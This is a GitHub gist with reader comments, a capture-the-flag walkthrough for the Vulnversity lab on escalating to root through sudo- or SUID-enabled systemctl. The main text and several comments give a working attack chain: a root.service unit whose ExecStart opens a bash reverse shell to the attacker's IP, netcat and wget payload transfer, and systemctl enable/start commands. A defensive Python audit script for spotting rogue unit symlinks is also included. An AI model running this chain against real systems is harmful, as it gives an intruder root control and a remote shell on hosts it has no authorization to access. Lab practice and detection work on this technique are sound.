Privilege Escalation: Systemctl (Misconfigured Permissions — sudo/SUID)

For a better reading experience:

https://alvinsmith.gitbook.io/progressive-oscp/untitled/vulnversity-privilege-escalation

0. Prepare your payload root.service

[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'

[Install]
WantedBy=multi-user.target

1. Find files/directories that are writable

find / -type f -maxdepth 2 -writable

or

find / -type d -maxdepth 2 -writable

2. Transfer the payload (or just write the file there using vi)

Start a listener on the target that writes whatever arrives into a file:
nc -vl 44444 > root.service
Send the file from your machine to the target:
nc -n TargetIP 44444 < root.service

3. Start listening on the 9999

nc -lvnp 9999

4. Execute the payload (assuming the file is under /dev/shm)

/bin/systemctl enable /dev/shm/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /dev/shm/root.service
Created symlink from /etc/systemd/system/root.service -> /dev/shm/root.service
/bin/systemctl start root

5. The nc listener on 9999 gives you a root shell
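The chain above works because systemctl, run with sudo or the SUID bit, will happily enable a unit file that lives in a directory an unprivileged user controls. As an added example that is not part of the gist, this Python audit takes the defender's side: it flags enabled units whose symlink resolves outside the standard unit directories or whose file is group/world-writable, and reports whether a systemctl binary is setuid root. TRUSTED_UNIT_DIRS is an assumption about a stock Linux layout, and demo() builds a constructed fixture in a temporary directory rather than touching the real system.

```python
import os
import stat
import tempfile
from pathlib import Path

# Directories systemd legitimately loads units from (assumption: stock Linux layout).
TRUSTED_UNIT_DIRS = ("/etc/systemd/system", "/run/systemd/system",
                     "/usr/lib/systemd/system", "/lib/systemd/system")

def is_setuid_root(path):
    """True if path is a root-owned setuid binary (the GTFOBins systemctl case)."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    return bool(st.st_mode & stat.S_ISUID) and st.st_uid == 0

def audit_unit_dir(unit_dir, trusted_dirs=TRUSTED_UNIT_DIRS):
    """Return (unit, finding, target) triples; walks *.wants/ as 'systemctl enable' creates."""
    trusted = tuple(str(Path(t).resolve()) + os.sep for t in trusted_dirs)
    findings = []
    for unit in Path(unit_dir).rglob("*.service"):
        target = unit.resolve()
        # 'systemctl enable /dev/shm/root.service' leaves symlinks pointing into /dev/shm.
        if unit.is_symlink() and not str(target).startswith(trusted):
            findings.append((unit.name, "symlink-outside-trusted-dirs", str(target)))
        # Anyone who can edit the unit file decides what runs as User=root.
        if target.stat().st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((unit.name, "group-or-world-writable", str(target)))
    return findings

def demo():
    """Constructed fixture in a temp dir mirroring the gist's layout; not a real system."""
    root = Path(tempfile.mkdtemp()).resolve()
    unit_dir = root / "etc/systemd/system"
    (unit_dir / "multi-user.target.wants").mkdir(parents=True)
    rogue = root / "dev/shm/root.service"
    rogue.parent.mkdir(parents=True)
    rogue.write_text("[Service]\nUser=root\nExecStart=/bin/true\n")
    rogue.chmod(0o666)  # world-writable, as files dropped in /dev/shm tend to be
    (unit_dir / "root.service").symlink_to(rogue)
    (unit_dir / "multi-user.target.wants/root.service").symlink_to(rogue)
    good = unit_dir / "good.service"  # a properly installed unit, should not be flagged
    good.write_text("[Service]\nExecStart=/bin/true\n")
    good.chmod(0o644)
    return audit_unit_dir(unit_dir, trusted_dirs=(unit_dir,))

if __name__ == "__main__":
    print(*demo(), sep="\n")
    print("systemctl setuid root:", is_setuid_root("/bin/systemctl"))
```

On a real host, run audit_unit_dir("/etc/systemd/system") with the default trusted list; any symlink that resolves into /dev/shm, /tmp or a home directory is the exact artifact step 4 leaves behind.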

Expand Knowledge

https://gtfobins.github.io/gtfobins/systemctl/#suid

https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory

https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/

https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49


@juxenova juxenova commented Jan 12, 2021

perfect


@njmulsqb njmulsqb commented Feb 2, 2021

Don't you think that find command should be find -type d instead of find -type f?


@A1vinSmith A1vinSmith commented Feb 2, 2021

Don't you think that find command should be find -type d instead of find -type f?

Yeah, I couldn't remember whether it's for files or directories. It would be type d if looking for the latter. Thank you for pointing it out.


@danielmartins-br danielmartins-br commented Apr 3, 2021

Vulnversity :)


@sakhan007 sakhan007 commented Jun 6, 2021

It's better to use find to find all writable directories in the system and hence use:
find / -type d -maxdepth 2 -writable


@carlvaneijk carlvaneijk commented Jun 16, 2021

forget about all that file transferring

START LISTENER (9999)

find / -type d -maxdepth 2 -writable

-CD to writable dir-

-One liner -
# Assign the variable on its own line (a prefix assignment is not visible to the same command),
# and use printf: bash's echo does not interpret \n without -e.
RATME="'bash -i >& /dev/tcp/yourIPHere/9999 0>&1'"
printf '[Unit]\nDescription=rooted-Oneliner\n\n[Service]\nType=simple\nUser=root\nExecStart=/bin/bash -c %s\n\n[Install]\nWantedBy=multi-user.target\n' "$RATME" > root.service

-Start-
/bin/systemctl enable /whatever-writable-dir/root.service
/bin/systemctl start root


@adibdz adibdz commented Sep 9, 2021

Just finished thm-vulnversity. I just found out that nc can transfer files. Before, I wrote the payload manually on the victim machine, very slowly and patiently.


@hoangquandn97 hoangquandn97 commented Oct 14, 2021

Who is here for the Vulnversity room?


@rochellelewis rochellelewis commented Oct 20, 2021

Easy method to get the root.service file onto the compromised server if you already have a nc reverse shell running (ahem, Vulnversity room) - serve it from your attacker machine using python http.server, then wget it in the reverse shell you already got.

Find a writable directory on the compromised server by running:
find / -type d -maxdepth 2 -writable
cd into it

Run a python http.server on your attacker machine in the directory that has your root.service file:
python3 -m http.server 8000

Go back to your nc reverse shell, and wget that sucker from your attacker machine. Check ifconfig or hostname -I for your attacker machine IP address.
wget http://YOUR-IP:8000/root.service
(for Vulnversity, I used the Internal Virtual IP)

Voila!
